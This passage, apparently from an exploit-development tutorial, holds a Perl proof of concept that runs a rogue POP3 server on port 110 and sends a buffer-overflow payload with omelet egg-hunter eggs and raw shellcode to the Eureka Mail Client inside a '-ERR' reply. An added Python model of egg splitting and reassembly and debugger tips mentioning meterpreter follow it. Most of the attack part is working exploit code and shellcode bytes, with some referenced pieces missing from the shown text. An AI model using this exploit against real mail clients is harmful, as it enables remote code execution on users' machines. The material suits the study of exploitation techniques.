my $egg1 = "\x5F\xFE\x6E\x61\x70\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x64\x61\x30\x23\x68\x23\x50\x61\x6E\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
# The first 5 bytes hold: 5F = size = 95, index = ff / fe, marker = 6e 61 70 -> 0x70616e; header + body = 95 + 5 = 100.
# The bytes after that are cut straight out of the original shellcode; spare space is filled with 0x40.
my $garbage = "This is a bunch of garbage" x 10;
my $padding = "\x42" x 1000;
my $shellcode = ("\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C".
                 "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53".
                 "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B".
                 "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95".
                 "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59".
                 "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A".
                 "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75".
                 "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03".
                 "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB".
                 "\x53".
                 "\x68\x64\x61\x30\x23".
                 "\x68\x23\x50\x61\x6E".
                 "\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8");
my $payload = $junk.$ret.$omelet_code.$padding.$egg0.$garbage.$egg1.$garbage.$shellcode;
my $port  = 110;
my $proto = getprotobyname('tcp');
socket(SERVER, PF_INET, SOCK_STREAM, $proto);
my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr);
listen(SERVER, SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
if ($client_addr = accept(CLIENT, SERVER)) {
    print "[+] Client Connected.\n";
    while (1) {
        # The POP server answers each command with "+OK" (success) or "-ERR" (failure) followed by a short text,
        # e.g. "+OK Password required for Bob" means USER succeeded and the client must now send its password.
        print CLIENT "-ERR".$payload."\n";
        print " ->Sent ".length($payload)." bytes\n";
    }
}
close CLIENT;
print "Connection closed\n";
```
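As an added example (not the page's script or hunter), the following Python models the egg layout the comments above describe (size byte, index counting down from 0xFF, 3-byte marker, 0x40 padding) and the reassembly the omelet stub performs when it finds the eggs scattered between garbage, the case a capture or memory dump of this PoC would present. The payload is a constructed byte pattern of the same length as the page's shellcode, not the shellcode itself, and "first copy of each index wins" is an assumption of this model.

```python
EGG_SIZE = 95        # payload bytes per egg; with the 5-byte header this is the 100 of the page's run
MARKER = 0x70616E    # "pan", stored little-endian as the 3 bytes 6E 61 70
PAD = b"\x40"        # filler for the last egg, as in the page's egg1


def egg_header(egg_size, index, marker=MARKER):
    """[size][0xFF - index][3-byte marker], the layout the page's comments describe."""
    return bytes([egg_size, 0xFF - index]) + marker.to_bytes(3, "little")


def split_into_eggs(payload, egg_size=EGG_SIZE, marker=MARKER):
    """Cut payload into eggs of egg_size bytes each; the last one is padded with 0x40."""
    eggs = []
    for index, off in enumerate(range(0, len(payload), egg_size)):
        chunk = payload[off:off + egg_size].ljust(egg_size, PAD)
        eggs.append(egg_header(egg_size, index, marker) + chunk)
    return eggs


def reassemble_from_image(image, egg_size=EGG_SIZE, marker=MARKER):
    """Scan an image for egg headers and rebuild the payload in index order, as the
    omelet stub does. Eggs may appear in any order and any number of times; the first
    copy of each index is used (assumption), and a marker whose size byte does not
    match is ignored, the same way the stub keys on the 0x5F size byte."""
    mark = marker.to_bytes(3, "little")
    found = {}
    pos = image.find(mark, 2)
    while pos != -1:
        size, index = image[pos - 2], 0xFF - image[pos - 1]
        body = image[pos + 3:pos + 3 + size]
        if size == egg_size and len(body) == size and index not in found:
            found[index] = body
        pos = image.find(mark, pos + 1)
    if not found or sorted(found) != list(range(len(found))):
        raise ValueError("egg set incomplete, have indexes %s" % sorted(found))
    return b"".join(found[i] for i in range(len(found)))


def demo():
    """Constructed 168-byte stand-in payload, cut into two eggs and scattered with
    garbage, egg1 before egg0, plus a decoy marker ('nap') with a wrong size byte."""
    payload = bytes((i * 7 + 3) & 0xFF for i in range(168))
    eggs = split_into_eggs(payload)
    image = b"garbage " * 4 + eggs[1] + b"xxnap" + eggs[0] + b" more garbage"
    return payload, eggs, reassemble_from_image(image)
```

The rebuilt buffer is 190 bytes: the 168 payload bytes followed by the 22 bytes of 0x40 padding that the stub copies along with the last egg.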
Extra tips:
mona plugin hint:
Message=Want more info about a given command ? Run !mona help <command>
compare / cmp looks for unmodified copies of the shellcode in memory and reports them; it is useful here.
This plugin is easier to use than the WinDbg plugin studied earlier.
A meterpreter payload can also be used; for details see:
http://write.blog.csdn.net/postedit/21300395